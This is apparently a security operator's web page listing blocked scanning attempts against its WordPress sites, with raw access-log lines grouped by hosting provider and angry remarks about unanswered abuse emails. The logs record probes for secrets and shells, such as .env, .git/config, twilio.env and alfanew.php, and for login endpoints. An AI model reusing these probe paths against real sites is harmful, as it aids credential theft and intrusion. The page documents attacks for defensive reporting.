report@abuseradar.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
191.101.50.119 www.website*x.com – – [17/Aug/2025:10:37:54 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
191.101.50.119 www.website*x.com – – [17/Aug/2025:10:37:55 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0“

AS21499 – Host Europe GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hosteurope.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
92.205.250.54 www.website*x.com – – [17/Aug/2025:10:56:28 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0“
92.205.250.54 www.website*x.com – – [17/Aug/2025:10:56:28 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

MAIL NR. 26 TODAY – Hacking-attempts from weekend!

abuse@netesta.com,abuse@dgn.net.tr,abuse@idnic.net,abuse@cloudhost.asia,hostmaster@idnic.net,abuse@ultimahost.pl

AS207582 – Emre Mert Delidere trading as Buuldy Bilisim – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@netesta.com,abuse@dgn.net.tr – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
185.87.120.51 www.website*x.com – – [17/Aug/2025:11:44:19 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0“
185.87.120.51 www.website*x.com – – [17/Aug/2025:11:44:20 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“

AS138608 – Cloud Host Pte Ltd – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@idnic.net,abuse@cloudhost.asia – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
103.187.147.142 www.website*x.com – – [17/Aug/2025:12:03:06 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
103.187.147.142 www.website*x.com – – [17/Aug/2025:12:03:06 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“

AS41508 – ZINET.NET.PL Sp. z.o.o. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ultimahost.pl – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
185.238.75.243 www.website*x.com – – [17/Aug/2025:12:31:32 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0“
185.238.75.243 www.website*x.com – – [17/Aug/2025:12:31:32 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“

MAIL NR. 26 TODAY – Hacking-attempts from weekend!

abuse@hosthatch.com,abuse@mayfirst.org,abuse@cheapy.host

AS63473 – HostHatch, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hosthatch.com – HAS NOW ANSWERED! THE HACKING-ATTEMPTS ARE STOPPED!
170.205.36.49 www.website*x.com – – [17/Aug/2025:12:40:48 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“
170.205.36.49 www.website*x.com – – [17/Aug/2025:12:40:49 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0“

May First Movement Technology – AS6939 – Hurricane Electric LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@mayfirst.org – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
204.19.241.77 www.website*x.com – – [17/Aug/2025:12:54:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“
204.19.241.77 www.website*x.com – – [17/Aug/2025:12:54:18 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“

AS401120 – cheapy.host LLC – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cheapy.host – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [17/Aug/2025:12:20:56 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“

HIER NOCH EIN LOGFILE-AUSZUG VOM Dienstag, 12.08.25!

Abuse-Mail Nr. 9 – Dienstag, 12.08.25:

AS16509 – Amazon.com, Inc. – VERY GOOD PROVIDER! – ALWAYS STOPS THE HACKER-IDIOTS AFTER ABUSE-MAIL FROM US!
trustandsafety@support.aws.com – ALWAYS ANSWERED IN OUR ABUSE EMAILS! VERY GOOD!
3.16.1.221 website*x.com – – [12/Aug/2025:10:04:06 +0200] „GET /wp-content/plugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.0“ 403 – „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“

AS49581 – Ferdinand Zink trading as Tube-Hosting – VERY UNSECURE AND IGNORANT PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@pfcloud.io – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2a05:b0c7:6819::1 website*x.com – – [12/Aug/2025:10:34:56 +0200] „GET /.git/config HTTP/1.0“ 302 – „-“ „curl/8.5.0“

AS198953 – Proton66 OOO – VERY UNSECURE AND IGNORANT PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@proton66.ru, mail@proton66.ru – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.135.232.10 website*x.com – – [12/Aug/2025:10:56:36 +0200] „GET /wp-login.php?wp_lang=en_US HTTP/1.0“ 403 – „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0“
45.135.232.10 website*x.com – – [12/Aug/2025:10:56:37 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com/xmlrpc.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0“

AS8075 – Microsoft Corporation – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
52.187.70.9 website*x.com – – [12/Aug/2025:11:34:06 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „-“ „Python/3.13 aiohttp/3.12.15“

LOGFILE-AUSZUG VOM WOCHENENDE – 09.08.25 bis 10.08.25!

Die Provider sind IMMER MIT VERANTWORTLICH! WAS WIR ABSOLUT NICHT MÖGEN, IST EINE IGNORANZ BZGL. UNSERER ABUSE-MAILS!!!

Hier die Abuse-Meldungen MIT DEN BEMERKUNGEN and die MIT VERANTWORTLICHEN PROVIDER vom Samstag, 09.08.25 UND Sonntag, 10.08.25:

MAIL NR. 1, Hacking-Attempts from Sunday!

abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de

AS141995 – Contabo Asia Private Limited – CONTABO ASIA AGAIN AND AGAIN EVERY DAY! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
194.233.80.217 www.website*x.de – – [10/Aug/2025:05:55:06 +0200] „GET /_ignition/execute-solution HTTP/1.0“ 403 – „-“ „python-requests/2.32.4“

MAIL NR. 2, Hacking-Attempts from Sunday!

adolfo@lhstelecom.com.br,abuse@hostglobal.plus

AS267455 – FIBRACOM TELECOMUNICACOES E SERVICOS EIRELI – ME – VERY IGNORANT PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
adolfo@lhstelecom.com.br – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
164.163.222.227 website*x.com – – [10/Aug/2025:02:36:23 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS202306 – HOSTGLOBAL.PLUS LTD – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hostglobal.plus
78.153.140.222 www.website*x.com – – [10/Aug/2025:12:55:15 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.43 (KHTML, like Gecko) Version/10.0 Mobile/14A5322e Safari/602.1“
78.153.140.222 website*x.com – – [10/Aug/2025:12:55:15 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; TNJB; rv:11.0) like Gecko“
78.153.140.222 website*x.com – – [10/Aug/2025:12:55:15 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Safari/537.36“
78.153.140.222 www.website*x.com – – [10/Aug/2025:12:55:15 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.8) Gecko/20051111 Firefox/1.5“
78.153.140.222 www.website*x.com – – [10/Aug/2025:12:55:15 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko“
78.153.140.222 website*x.com – – [10/Aug/2025:12:55:16 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3“
78.153.140.222 www.website*x.com – – [10/Aug/2025:12:55:16 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9a2) Gecko/20080530 Firefox/3.0a2“
78.153.140.222 website*x.com – – [10/Aug/2025:12:55:16 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)“
78.153.140.222 website*x.com – – [10/Aug/2025:12:55:16 +0200] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 4.2.2; en-gb; SAMSUNG GT-I9505 Build/JDQ39) AppleWebKit/535.19 (KHTML, like Gecko) Version/1.0 Chrome/18.0.1025.308 Mobile Safari/535.19“
78.153.140.222 www.website*x.com – – [10/Aug/2025:12:55:16 +0200] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27“
78.153.140.222 website*x.com – – [10/Aug/2025:12:55:18 +0200] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1“
… and so on…. and so on!!!

MAIL NR. 3, Hacking-Attempts from Sunday!

abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,dem@demenin.net, abuse@ntup.net,afrinic-tech.gh@mtn.com, andrew.bulley@mtn.com

AS51167 – Contabo GmbH – CONTABO AGAIN AND AGAIN EVERY DAY! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
207.180.255.216 website*x.com – – [10/Aug/2025:02:42:06 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
207.180.255.216 website*x.com – – [10/Aug/2025:02:42:06 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
207.180.255.216 website*x.com – – [10/Aug/2025:02:42:06 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“

AS48693 – Rices Privately owned enterprise- VERY UNSECURE AND IGNORANT!!! FOR US IS THIS A ROGUE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
dem@demenin.net, abuse@ntup.net = NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
194.145.227.125 website*x.com – – [10/Aug/2025:03:35:42 +0200] „GET /wp-content/plugins/ip-logger/chart/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“

AS30986 – Scancom Limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
afrinic-tech.gh@mtn.com, andrew.bulley@mtn.com
154.160.77.18 website*x.com – – [10/Aug/2025:08:07:09 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

MAIL NR. 4, Hacking-Attempts from Sunday!

abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com,mms.kavitash@gmail.com

AS8075 – Microsoft Corporation – HERE WITH 3 IP´S! – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
172.192.66.60 website*x.de – – [10/Aug/2025:02:52:42 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:02:52:43 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:02:52:58 +0200] „GET /file3.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:02:53:13 +0200] „GET /file4.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:02:53:28 +0200] „GET /file5.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:02:53:43 +0200] „GET /file6.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:02:53:58 +0200] „GET /file7.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:02:54:13 +0200] „GET /file8.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:02:54:28 +0200] „GET /file9.php HTTP/1.0“ 302 – „-“ „-“
+
13.94.100.4 website*x.de – – [10/Aug/2025:09:22:13 +0200] „GET /.alf.php HTTP/1.0“ 302 – „-“ „-“
+
52.164.124.172 website*x.de – – [10/Aug/2025:12:27:57 +0200] „GET /alfanew.php HTTP/1.0“ 302 – „-“ „-“

AS132220 – JPR Digital Pvt. Ltd. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
mms.kavitash@gmail.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
110.44.9.221 website*x.de – – [10/Aug/2025:06:10:24 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.2; x86) AppleWebKit/537.36 (KHTML, like Gecko) Opera/75.0.0.0 Safari/537.36“

MAIL NR. 5, Hacking-Attempts from Sunday!

admin@serveroffer.lt,abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com

AS209605 – UAB Host Baltic – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@serveroffer.lt – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
91.224.92.45 website*x.com – – [10/Aug/2025:04:47:17 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [10/Aug/2025:04:47:17 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0“
91.224.92.45 website*x.com – – [10/Aug/2025:04:47:17 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [10/Aug/2025:05:02:09 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [10/Aug/2025:05:02:09 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [10/Aug/2025:05:02:10 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [10/Aug/2025:06:46:43 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0“
91.224.92.45 website*x.com – – [10/Aug/2025:06:46:43 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [10/Aug/2025:06:46:43 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [10/Aug/2025:07:25:01 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [10/Aug/2025:07:25:01 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:121.0) Gecko/20100101 Firefox/121.0“
91.224.92.45 website*x.com – – [10/Aug/2025:07:25:01 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [10/Aug/2025:07:25:01 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0“
91.224.92.45 website*x.com – – [10/Aug/2025:07:25:01 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15“
91.224.92.45 website*x.com – – [10/Aug/2025:07:25:01 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“

MAIL NR. 6, Hacking-Attempts from Sunday!

abuse@cdn77.com, support@cdn77.com, network@cdn77.com,abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com

AS212238 – Datacamp Limited – VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cdn77.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
